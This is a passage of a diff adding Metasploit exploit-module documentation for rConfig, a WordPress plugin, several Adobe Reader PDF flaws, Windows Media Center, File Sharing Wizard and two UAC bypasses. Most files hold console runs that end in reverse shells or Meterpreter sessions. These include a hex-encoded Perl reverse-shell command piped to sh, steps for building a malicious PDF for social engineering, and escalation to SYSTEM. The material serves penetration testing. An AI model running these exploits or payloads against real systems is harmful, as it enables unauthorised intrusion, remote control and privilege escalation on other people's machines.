+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > check
+
+  [*] Executing command: id
+  [*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
+  [+] 172.16.191.131:443 - The target is vulnerable.
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > show targets
+
+  Exploit targets:
+
+     Id  Name
+     --  ----
+     0   Automatic (Unix In-Memory)
+     1   Automatic (Linux Dropper)
+
+
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0
+  target => 0
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set payload cmd/unix/reverse_perl
+  payload => cmd/unix/reverse_perl
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.191.165 
+  lhost => 172.16.191.165
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Executing command: id
+  [*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
+  [*] Executing command: /bin/echo -ne '\x70\x65\x72\x6c\x20\x2d\x4d\x49\x4f\x20\x2d\x65\x20\x27\x24\x70\x3d\x66\x6f\x72\x6b\x3b\x65\x78\x69\x74\x2c\x69\x66\x28\x24\x70\x29\x3b\x66\x6f\x72\x65\x61\x63\x68\x20\x6d\x79\x20\x24\x6b\x65\x79\x28\x6b\x65\x79\x73\x20\x25\x45\x4e\x56\x29\x7b\x69\x66\x28\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x7e\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x24\x31\x3b\x7d\x7d\x24\x63\x3d\x6e\x65\x77\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x28\x50\x65\x65\x72\x41\x64\x64\x72\x2c\x22\x31\x37\x32\x2e\x31\x36\x2e\x31\x39\x31\x2e\x31\x36\x35\x3a\x34\x34\x34\x34\x22\x29\x3b\x53\x54\x44\x49\x4e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x72\x29\x3b\x24\x7e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x77\x29\x3b\x77\x68\x69\x6c\x65\x28\x3c\x3e\x29\x7b\x69\x66\x28\x24\x5f\x3d\x7e\x20\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x73\x79\x73\x74\x65\x6d\x20\x24\x31\x3b\x7d\x7d\x3b\x27'|sh
+  [*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.131:35004) at 2019-10-29 11:48:59 -0400
+
+  id
+  uid=48(apache) gid=48(apache) groups=48(apache)
+  uname -a
+  Linux localhost.localdomain 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+  pwd
+  /home/rconfig/www/install/lib/ajaxHandlers
+  ^C
+  Abort session 1? [y/N]  y
+  ""
+
+  [*] 172.16.191.131 - Command shell session 1 closed.  Reason: User exit
+  msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > 
+  ```
+

documentation/modules/exploit/unix/webapp/wp_plainview_activity_monitor_rce.md

@@ -0,0 +1,75 @@
+## Description
+
+  This module uses administrative functionality available in WordPress
+  when the Plainview Activity Monitor plugin is installed to
+  gain a shell with web server user permissions.
+
+## Vulnerable Software
+
+  This module has been tested successfully on WordPress 4.6
+  with Plainview Activity Monitor version 20161228 installed.
+
+  Software:
+
+  * https://wordpress.org/plugins/plainview-activity-monitor/
+  * https://wordpress.org/download/releases/
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/wp_plainview_activity_monitor_rce`
+  3. Do: `set rhosts <IP or domain_name>`
+  4. Do: `set username <username>`
+  5. Do: `set password <password>`
+  6. Do: `set vhost <domain_name>`
+  7. Do: `run`
+  8. You should get a new session
+
+## Options
+
+  **TARGETURI**
+
+  The base path to WordPress (default: `/`)
+
+  **USERNAME**
+
+  The username for WordPress
+
+  **PASSWORD**
+
+  The password for WordPress
+
+
+## Scenarios
+
+ ```
+  msf5 > use exploit/unix/webapp/wp_plainview_activity_monitor_rce 
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set rhosts wordpress.test.local
+  rhosts => wordpress.test.local
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set username admin
+  username => admin
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set password 123456
+  password => 123456
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set vhost wordpress.test.local
+  vhost => wordpress.test.local
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > show targets
+
+  Exploit targets:
+
+     Id  Name
+     --  ----
+     0   WordPress
+
+
+  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > exploit
+
+  [*] Started reverse TCP handler on 10.0.0.2:4444 
+  [*] Trying to login...
+  [+] Login Successful
+  [*] Sending stage (38288 bytes) to 10.0.0.3
+  [*] Meterpreter session 1 opened (10.0.0.2:4444 -> 10.0.0.3:51990) at 2019-11-10 08:24:11 +0100
+
+  meterpreter > getuid
+  Server username: www-data (33)
+  meterpreter > 
+ ```

documentation/modules/exploit/windows/fileformat/adobe_geticon.md

@@ -0,0 +1,87 @@
+## Vulnerable Application
+
+This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1.
+By creating a specially crafted pdf that a contains malformed `Collab.getIcon()` call, an attacker may be able to execute arbitrary code.
+
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-0-0)
+
+### Test results (on Windows XP SP3)
+
+  * reader 7.0.5 - no trigger
+  * reader 7.0.8 - no trigger
+  * reader 7.0.9 - no trigger
+  * reader 7.1.0 - no trigger
+  * reader 7.1.1 - reported not vulnerable
+  * reader 8.0.0 - works
+  * reader 8.1.2 - works
+  * reader 8.1.3 - reported not vulnerable
+  * reader 9.0.0 - works
+  * reader 9.1.0 - reported not vulnerable
+
+## Options
+
+  **FILENAME**
+
+  The file name
+
+## Verification Steps
+
+   1. Install application on the target machine
+   2. Start msfconsole
+   3. Do: ```use exploit/windows/fileformat/adobe_geticon```
+   4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+   5. Do: ```set LHOST [IP]```
+   6. Do: ```exploit```
+   7. Do: ```use exploit/multi/handler```
+   8. Do: ```set LHOST [IP]```
+   9. Do: ```exploit```
+   10. Do: Open PDF on target machine with vulnerable software
+
+## Scenarios
+
+### Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)
+
+  ```
+  msf > use exploit/windows/fileformat/adobe_geticon
+  msf exploit(windows/fileformat/adobe_geticon) > set FILENAME icon.pdf
+    FILENAME => icon.pdf
+  msf exploit(windows/fileformat/adobe_geticon) > exploit
+
+    [*] Creating 'icon.pdf' file...
+    [+] icon.pdf stored at /root/.msf4/local/icon.pdf
+  msf exploit(windows/fileformat/adobe_geticon) > cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf
+    [*] exec: cp /root/.msf4/local/icon.pdf /var/www/html/icon.pdf
+
+  msf payload(windows/meterpreter/reverse_tcp) > use exploit/multi/handler
+  msf exploit(multi/handler) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(multi/handler) > exploit
+
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] Sending stage (180291 bytes) to 192.168.1.5
+    [*] Meterpreter session 3 opened (192.168.1.3:4444 -> 192.168.1.5:1160) at 2019-12-06 14:40:10 -0700
+
+  meterpreter > sysinfo
+    Computer        : COMPUTER_1
+    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/windows
+  meterpreter > getuid
+    Server username: COMPUTER_1\USER
+  meterpreter > run post/windows/gather/enum_applications
+
+    [*] Enumerating applications installed on COMPUTER_1
+
+    Installed Applications
+    ======================
+
+     Name            Version
+     ----            -------
+     Adobe Reader 8  8.0.0
+
+
+    [+] Results stored in: /root/.msf4/loot/20191206144654_default_192.168.1.5_host.application_162364.txt
+  ```

documentation/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe.md

@@ -0,0 +1,91 @@
+## Vulnerable Application
+
+This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.
+
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-2-0)
+
+## Verification Steps
+
+   1. Install application on the target machine
+   2. Start msfconsole
+   3. Do: ```use exploit/windows/fileformat/adobe_pdf_embedded_exe```
+   4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+   5. Do: ```set LHOST [IP]```
+   6. Do: ```exploit```
+   7. Do: ```use exploit/multi/handler```
+   8. Do: ```set LHOST [IP]```
+   9. Do: ```exploit```
+   10. Do: Open PDF on target machine with vulnerable software
+
+## Options
+
+  **EXENAME**
+
+  The Name of payload exe.
+
+  **FILENAME**
+
+  The output filename.
+
+  **INFILENAME**
+
+  The Input PDF filename.
+
+  **LAUNCH_MESSAGE**
+
+  The message to display in the `File:` area of the PDF.
+
+## Scenarios
+
+### Adobe Reader 8.2.0 on Windows XP (5.1 Build 2600, Service Pack 3)
+
+  ```
+  msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
+  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
+    payload => windows/meterpreter/reverse_tcp
+  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
+
+    [*] Reading in '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
+    [*] Parsing '/usr/share/metasploit-framework/data/exploits/CVE-2010-1240/template.pdf'...
+    [*] Using 'windows/meterpreter/reverse_tcp' as payload...
+    [+] Parsing Successful. Creating 'evil.pdf' file...
+    [+] evil.pdf stored at /root/.msf4/local/evil.pdf
+  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
+    [*] exec: cp /root/.msf4/local/evil.pdf /var/www/html/evil.pdf
+
+  msf exploit(windows/fileformat/adobe_pdf_embedded_exe) > use exploit/multi/handler
+  msf exploit(multi/handler) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(multi/handler) > exploit
+
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] Sending stage (180291 bytes) to 192.168.1.5
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1121) at 2019-12-09 14:17:10 -0700
+
+  meterpreter > sysinfo
+    Computer        : COMPUTER_1
+    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/windows
+  meterpreter > getuid
+    Server username: COMPUTER_1\USER
+  meterpreter > run post/windows/gather/enum_applications
+
+    [*] Enumerating applications installed on COMPUTER_1
+
+      Installed Applications
+      ======================
+
+      Name                Version
+      ----                -------
+      Adobe Reader 8.2.0  8.2.0
+
+
+
+    [+] Results stored in: /root/.msf4/loot/20191209141758_default_192.168.1.5_host.application_783490.txt
+      ```

documentation/modules/exploit/windows/fileformat/adobe_reader_u3d.md

@@ -0,0 +1,78 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in the U3D handling within versions 9.x through 9.4.6 and 10 through to 10.1.1 of Adobe Reader.
+The vulnerability is due to the use of uninitialized memory. Arbitrary code execution is achieved by embedding specially
+crafted U3D data into a PDF document. A heap spray via JavaScript is used in order to ensure that the memory
+used by the invalid pointer issue is controlled.
+
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-9-4-0)
+
+## Verification Steps
+
+   1. Install application on the target machine
+   2. Start msfconsole
+   3. Do: ```use exploit/windows/fileformat/adobe_reader_u3d```
+   4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+   5. Do: ```set LHOST [IP]```
+   6. Do: ```exploit```
+   7. Do: ```use [exploit/multi/handler```
+   8. Do: ```set LHOST [IP]```
+   9. Do: ```exploit```
+   10. Do: Open PDF on target machine with vulnerable software
+
+## Options
+
+  **FILENAME**
+
+  The file name.
+
+  **OBFUSCATE**
+
+  Enable JavaScript obfuscation
+
+## Scenarios
+
+### Adobe Reader 9.4.0 on Windows XP (5.1 Build 2600, Service Pack 3)
+
+  ```
+  msf > use exploit/windows/fileformat/adobe_reader_u3d
+  msf exploit(windows/fileformat/adobe_reader_u3d) > set FILENAME myFile.pdf
+    FILENAME => myFile.pdf
+  msf exploit(windows/fileformat/adobe_reader_u3d) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(windows/fileformat/adobe_reader_u3d) > exploit
+
+    [*] Creating 'myFile.pdf' file...
+    [+] myFile.pdf stored at /root/.msf4/local/myFile.pdf
+  msf exploit(windows/fileformat/adobe_reader_u3d) > use exploit/multi/handler
+  msf exploit(multi/handler) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf5 exploit(multi/handler) > exploit
+
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] Sending stage (180291 bytes) to 192.168.1.5
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1103) at 2019-12-05 18:01:07 -0700
+  meterpreter > sysinfo
+    Computer        : COMPUTER_1
+    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/windows
+  meterpreter > getuid
+    Server username: COMPUTER_1\USER
+  meterpreter > run post/windows/gather/enum_applications
+
+    [*] Enumerating applications installed on COMPUTER_1
+
+    Installed Applications
+    ======================
+
+    Name                Version
+    ----                -------
+    Adobe Reader 9.4.0  9.4.0
+
+
+    [+] Results stored in: /root/.msf4/loot/20191205180436_default_192.168.1.5_host.application_540854.txt
+  ```

documentation/modules/exploit/windows/fileformat/adobe_utilprintf.md

@@ -0,0 +1,72 @@
+## Vulnerable Application
+
+This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially
+crafted pdf that a contains malformed `util.printf()` entry, an attacker may be able to execute arbitrary code.
+
+Link to vulnerable software [OldVersion](http://www.oldversion.com/windows/download/acrobat-reader-8-0-0)
+
+## Verification Steps
+
+  1. Install application on the target machine
+  2. Start msfconsole
+  3. Do: ```use exploit/windows/fileformat/adobe_utilprintf```
+  4. Do: ```set payload [windows/meterpreter/reverse_tcp]```
+  5. Do: ```set LHOST [IP]```
+  6. Do: ```exploit```
+  7. Do: ```use exploit/multi/handler```
+  8. Do: ```set LHOST [IP]```
+  9. Do: ```exploit```
+  10. Do: Open PDF on target machine with vulnerable software
+
+## Scenarios
+
+### Adobe Reader 8.0.0 on Windows XP (5.1 Build 2600, Service Pack 3)
+
+  ```
+  msf > use exploit/windows/fileformat/adobe_utilprintf
+  msf exploit(windows/fileformat/adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
+    payload => windows/meterpreter/reverse_tcp
+  msf exploit(windows/fileformat/adobe_utilprintf) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(windows/fileformat/adobe_utilprintf) > set FILENAME utilprintf.pdf
+    FILENAME => utilprintf.pdf
+  msf exploit(windows/fileformat/adobe_utilprintf) > exploit
+
+    [*] Creating 'utilprintf.pdf' file...
+    [+] utilprintf.pdf stored at /root/.msf4/local/utilprintf.pdf
+  msf exploit(windows/fileformat/adobe_utilprintf) > use exploit/multi/handler
+  msf exploit(multi/handler) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(multi/handler) > exploit
+  msf exploit(multi/handler) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(multi/handler) > exploit
+
+    [*] Started reverse TCP handler on 192.168.1.3:4444
+    [*] Sending stage (180291 bytes) to 192.168.1.5
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.5:1057) at 2019-12-09 13:47:07 -0700
+
+  meterpreter > sysinfo
+    Computer        : COMPUTER_1
+    OS              : Windows XP (5.1 Build 2600, Service Pack 3).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/windows
+    meterpreter > getuid
+    Server username: COMPUTER_1\USER
+  meterpreter > run post/windows/gather/enum_applications
+
+    [*] Enumerating applications installed on COMPUTER_1
+
+    Installed Applications
+    ======================
+
+    Name            Version
+    ----            -------
+    Adobe Reader 8  8.0.0
+
+
+    [+] Results stored in: /root/.msf4/loot/20191209134901_default_192.168.1.5_host.application_066854.txt
+    ```

documentation/modules/exploit/windows/fileformat/ms15_100_mcl_exe.md

@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the .mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/windows/fileformat/ms15_100_mcl_exe`
+3. Do: `set FILENAME [filename.mcl]`
+4. Do: `set FILE_NAME [filename.exe]`
+5. Do: `set payload [windows/meterpreter/reverse_tcp]`
+6. Do: `set SRVHOST [IP]`
+7. Do: `set SRVPORT [number]`
+8. Do: `exploit`
+
+## Options
+
+### FILENAME
+The MCL file.
+
+### FILE_NAME
+The name of the malicious payload to execute.
+
+### FOLDER_NAME
+Share Name (Default: Random).
+
+### SRVHOST
+The local host to listen on. This must be an address on the local machine or 0.0.0.0.
+
+### SRVPORT
+The local port to listen on.
+
+## Scenarios
+
+### A run on Windows Vista (Build 6000) and Kali Linux 2019.3
+
+  ```
+  msf > use exploit/windows/fileformat/ms15_100_mcl_exe
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) >  set FILENAME file.mcl
+    FILENAME => file.mcl
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set FILE_NAME file.exe
+    FILE_NAME => file.exe
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
+    PAYLOAD => windows/meterpreter/reverse_tcp
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > set LHOST 192.168.1.3
+    LHOST => 192.168.1.3
+  msf exploit(windows/fileformat/ms15_100_mcl_exe) > exploit
+    [*] Server started.
+    [*] Malicious executable at \\192.168.1.3\Egoj\file.exe...
+    [*] Creating 'file.mcl' file ...
+    [+] file.mcl stored at /root/.msf4/local/file.mcl
+    [*] Sending stage (180291 bytes) to 192.168.1.2
+    [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.2:49248) at 2019-11-27 10:11:45 -0700
+  ```

documentation/modules/exploit/windows/http/file_sharing_wizard_seh.md

@@ -0,0 +1,49 @@
+## Description
+
+This module exploits a vulnerability in File Sharing Wizard version 1.5.0 which
+allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow in an HTTP POST parameter.
+
+## Vulnerable Application
+
+This module has been tested successfully on:
+
+ * Windows 7 x86 SP1
+
+The application installer is linked below
+
+[File Sharing Wizard Installer](https://www.exploit-db.com/apps/da3a3626f99a85f9ab59ab77f083ff80-fs-wizard-setup.exe)
+
+Once installed run the application and click "Start" to enable the server.
+
+## Verification Steps
+
+ 1. Start `msfconsole`
+ 2. Do: `use exploits/windows/http/file_sharing_wizard_seh`
+ 3. Do: `set rhosts [IP]`
+ 4. Do: `run`
+ 5. Your payload should get executed
+
+## Scenarios
+
+```
+msf5 > use exploit/windows/http/file_sharing_wizard_seh
+msf5 exploit(windows/http/file_sharing_wizard_seh) > set RHOSTS 192.168.56.101
+RHOSTS => 192.168.56.101
+msf5 exploit(windows/http/file_sharing_wizard_seh) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] 192.168.56.101:80 - Connecting to target
+[*] 192.168.56.101:80 - Sending payload to target
+[*] Sending stage (180291 bytes) to 192.168.56.101
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49164) at 2019-10-03 23:09:18 +0100
+
+meterpreter > sysinfo
+Computer        : TARGET
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : en_GB
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter >
+```

documentation/modules/exploit/windows/local/bypassuac_dotnet_profiler.md

@@ -0,0 +1,155 @@
+## Introduction
+
+Microsoft Windows allows for the automatic loading of a profiling COM object during
+the launch of a CLR process based on certain environment variables ostensibly to
+monitor execution.  In this case, we abuse the profiler by pointing to a payload DLL
+that will be launched as the profiling thread.  This thread will run at the permission
+level of the calling process, so an auto-elevating process will launch the DLL with
+elevated permissions.  In this case, we use gpedit.msc as the auto-elevated CLR
+process, but others would work, too.
+
+## Usage
+
+1. Create a session on the target system under the context of a local administrative user.
+2. Begin interacting with the module: `use exploit/windows/local/bypassuac_dotnet_profiler`.
+3. Set the `PAYLOAD` and configure it correctly.
+4. If an existing handler is configured to receive the elevated session, then the module's
+   handler should be disabled: `set DisablePayloadHandler true`.
+5. Make sure that the `SESSION` value is set to the existing session identifier.
+6. Invoke the module: `run`.
+
+## Scenario
+
+### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64
+
+```
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] UAC is Enabled, checking level...
+[*] Checking admin status...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] win_dir = C:\Windows
+[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
+[*] exploit_dir = C:\Windows\System32\
+[*] target_filepath = C:\Windows\System32\gpedit.msc
+[*] Making Payload
+[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
+[*] UUID = a47dbe47-41a6-42ed-95a0-e2cc4710a75a
+[*] Writing  to HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32
+[*] Writing COR_PROFILER to HKCU\Environment
+[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
+[*] Writing COR_PROFILER_PATH to HKCU\Environment
+[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll
+[*] Payload Upload Complete
+[*] Launching C:\Windows\System32\gpedit.msc
+[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\vehxxpkdx.dll!
+[*] Please wait for session and cleanup....
+[*] Sending stage (206403 bytes) to 192.168.132.187
+[*] Meterpreter session 5 opened (192.168.135.168:4444 -> 192.168.132.187:49234) at 2019-11-15 12:14:41 -0600
+[*] Removing Registry Changes
+[*] Deleting HKCU\Software\Classes\CLSID\{a47dbe47-41a6-42ed-95a0-e2cc4710a75a}\InprocServer32 key
+[*] Deleting COR_PROFILER from HKCU\Environment key
+[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
+[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
+[*] Registry Changes Removed
+
+meterpreter > sysinfo
+Computer        : WIN7X64-SP1
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: WIN7X64-SP1\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+
+```
+
+### Windows Windows 7 (6.1 Build 7601, Service Pack 1) x64
+```
+msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_dotnet_profiler 
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > set session 6
+session => 6
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > show options
+
+Module options (exploit/windows/local/bypassuac_dotnet_profiler):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
+   SESSION       6                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+msf5 exploit(windows/local/bypassuac_dotnet_profiler) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] UAC is Enabled, checking level...
+[*] Checking admin status...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] win_dir = C:\Windows
+[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
+[*] exploit_dir = C:\Windows\System32\
+[*] target_filepath = C:\Windows\System32\gpedit.msc
+[*] Making Payload
+[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
+[*] UUID = d472ba96-3dfc-432c-8ad2-f44ada2a39ec
+[*] Writing COR_PROFILER to HKCU\Environment
+[*] Writing COR_ENABLE_PROFILING to HKCU\Environment
+[*] Writing COR_PROFILER_PATH to HKCU\Environment
+[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll
+[*] Payload Upload Complete
+[*] Launching C:\Windows\System32\gpedit.msc
+[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\LNpAorHj.dll!
+[*] Please wait for session and cleanup....
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 7 opened (192.168.135.168:4444 -> 192.168.132.125:49683) at 2019-11-15 12:18:54 -0600
+[*] Removing Registry Changes
+[*] Deleting COR_PROFILER from HKCU\Environment key
+[*] Deleting COR_ENABLE_PROFILING from HKCU\Environment key
+[*] Deleting COR_PROFILER_PATH from HKCU\Environment key
+[*] Registry Changes Removed
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-D1E425Q\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+
+```

documentation/modules/exploit/windows/local/bypassuac_sdclt.md

@@ -0,0 +1,87 @@
+## Introduction
+
+This module exploits an autoelevate feature in the windows backup
+system's sdclt.exe binary to run as a higher integrity process.
+
+## Usage
+
+1. Create a session on the target system under the context of a local administrative user.
+2. Begin interacting with the module: `use exploit/windows/local/bypassuac_sdclt`.
+3. Set the `PAYLOAD` and configure it correctly.
+4. If an existing handler is configured to receive the elevated session, then the module's
+   handler should be disabled: `set DisablePayloadHandler true`.
+5. Make sure that the `SESSION` value is set to the existing session identifier.
+6. Invoke the module: `run`.
+
+## Scenario
+
+### Windows 10.0.17134 x64
+
+```
+msf5 exploit(windows/local/bypassuac_sdclt) > show options
+
+Module options (exploit/windows/local/bypassuac_sdclt):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   PAYLOAD_NAME                   no        The filename to use for the payload binary (%RAND% by default).
+   SESSION       1                yes       The session to run this module on.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows x64
+
+
+msf5 exploit(windows/local/bypassuac_sdclt) > run
+
+[*] Started reverse TCP handler on 192.168.135.168:4444 
+[*] UAC is Enabled, checking level...
+[*] Checking admin status...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] win_dir = C:\Windows
+[*] tmp_dir = C:\Users\msfuser\AppData\Local\Temp
+[*] exploit_dir = C:\Windows\System32\
+[*] exploit_file = C:\Windows\System32\sdclt.exe
+[*] payload_pathname = C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
+[*] Making Payload
+[*] reg_command = C:\Windows\System32\cmd.exe /c start C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
+[*] Uploading Payload to C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe
+[*] Payload Upload Complete
+[*] Launching C:\Windows\System32\sdclt.exe
+[!] This exploit requires manual cleanup of 'C:\Users\msfuser\AppData\Local\Temp\YwaGlnJtV.exe!
+[*] Please wait for session and cleanup....
+[*] Sending stage (206403 bytes) to 192.168.132.125
+[*] Meterpreter session 2 opened (192.168.135.168:4444 -> 192.168.132.125:49679) at 2019-10-25 14:55:08 -0500
+[*] Removing Registry Changes
+[*] Registry Changes Removed
+
+meterpreter > sysinfo
+Computer        : DESKTOP-D1E425Q
+OS              : Windows 10 (10.0 Build 17134).
+Architecture    : x64
+System Language : en_US
